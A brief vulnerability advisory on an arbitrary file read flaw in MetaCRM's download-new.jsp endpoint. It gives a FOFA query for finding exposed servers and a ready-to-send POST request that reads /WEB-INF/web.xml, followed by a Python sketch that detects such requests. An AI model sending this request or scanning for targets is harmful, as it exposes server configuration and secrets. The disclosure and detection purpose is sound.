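MetaCRM (美特CRM) system: arbitrary file read vulnerability in the download-new.jsp endpoint
1: Vulnerability description
The download-new.jsp endpoint of the MetaCRM (美特CRM) system has an arbitrary file read vulnerability.
2: Affected versions
MetaCRM (美特CRM)
3: FOFA query
body="/common/scripts/basic.js" && body="www.metacrm.com.cn"
4: Reproduction
Vulnerable URL: https://xx.xx.xx.xx/business/common/download-new.jsp
Request packet:
POST /business/common/download-new.jsp HTTP/1.1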
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Host: xx.xx.xx.xx
Content-Length: 36
Content-Type: application/x-www-form-urlencoded

filename=1.png&page=/WEB-INF/web.xml
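
A detection sketch for the request above, added here as an example and not part of the original post: it parses a raw HTTP request and flags page values sent to this endpoint that point into WEB-INF or META-INF, use .. traversal, or carry a scheme or drive prefix, including percent-encoded and backslash variants. The function names and the choice of heuristics are assumptions; the sample request is constructed from the one in the post.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

ENDPOINT = "/business/common/download-new.jsp"  # path taken from the advisory
PROTECTED = ("web-inf", "meta-inf")             # servlet-container private dirs
# Constructed sample: the advisory's request, reduced to the relevant lines.
SAMPLE = (
    "POST /business/common/download-new.jsp HTTP/1.1\r\n"
    "Host: xx.xx.xx.xx\r\n"
    "\r\n"
    "filename=1.png&page=/WEB-INF/web.xml"
)

def _decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded values are seen in clear."""
    for _ in range(rounds):
        value, prev = unquote(value), value
        if value == prev:
            break
    return value

def suspicious_page(value):
    """Return a reason string if the page value targets a non-public file."""
    raw = _decode(value).replace("\\", "/")
    parts = [p.lower() for p in raw.split("/") if p]
    if ".." in parts:
        return "directory traversal"
    if any(p in PROTECTED for p in parts):
        return "container-private directory"
    if re.match(r"^[a-z][a-z0-9+.-]*:", raw, re.I):
        return "scheme or drive prefix"
    return None

def inspect_request(raw_request):
    """Parse one raw HTTP request; return (param, reason) findings."""
    head, _, body = raw_request.replace("\r\n", "\n").partition("\n\n")
    first = head.split("\n", 1)[0].split()
    if len(first) < 2:
        return []
    url = urlsplit(first[1])
    if ("/" + _decode(url.path).lstrip("/")).lower() != ENDPOINT:
        return []
    params = parse_qs(url.query)
    if first[0].upper() == "POST":  # form body carries the parameter here
        for key, values in parse_qs(body.strip()).items():
            params.setdefault(key, []).extend(values)
    return [("page", r) for r in map(suspicious_page, params.get("page", [])) if r]

if __name__ == "__main__":
    print(inspect_request(SAMPLE))
```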